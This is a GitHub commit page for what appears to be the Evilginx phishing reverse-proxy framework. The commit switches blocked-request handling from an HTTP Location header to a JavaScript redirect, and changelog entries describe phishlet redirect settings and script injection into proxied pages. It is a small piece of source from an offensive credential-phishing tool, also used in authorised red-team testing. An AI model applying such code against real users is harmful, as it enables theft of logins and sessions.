Skip to content

Commit

Permalink
blocked requests redirected with javascript
Browse files Browse the repository at this point in the history
  • Loading branch information
kgretzky committed Aug 24, 2023
1 parent 7a959bb commit a8d2cd3
Show file tree
Hide file tree
Showing 2 changed files with 2 additions and 5 deletions.
1 change: 1 addition & 0 deletions CHANGELOG
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,7 @@
- Feature: You can now override globally set unauthorized redirect URL per phishlet with `phishlet unauth_url <phishlet> <url>`.
- Fixed: Disabled caching for HTML and Javascript content to make on-the-fly proxied content replacements and injections more reliable.
- Fixed: Improved JS injection by adding `<script src"...">` references into HTML pages, instead of dumping the whole script there.
- Fixed: Blocked requests will now redirect using javascript, instead of HTTP location header.
- Fixed: Changed `redirect_url` to `unauth_url` in global config to avoid confusion.
- Fixed: Fixed HTTP status code response for Javascript redirects.
- Fixed: Javascript redirects now happen on `text/html` pages with valid HTML content.
Expand Down
6 changes: 1 addition & 5 deletions core/http_proxy.go
Original file line number Diff line number Diff line change
Expand Up @@ -1155,11 +1155,7 @@ func (p *HttpProxy) blockRequest(req *http.Request) (*http.Request, *http.Respon
}

if redirect_url != "" {
resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
if resp != nil {
resp.Header.Add("Location", redirect_url)
return req, resp
}
return p.javascriptRedirect(req, redirect_url)
} else {
resp := goproxy.NewResponse(req, "text/html", http.StatusForbidden, "")
if resp != nil {
Expand Down

1 comment on commit a8d2cd3

@jvolker1
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

How do i install the new version of Evilginx

Please sign in to comment.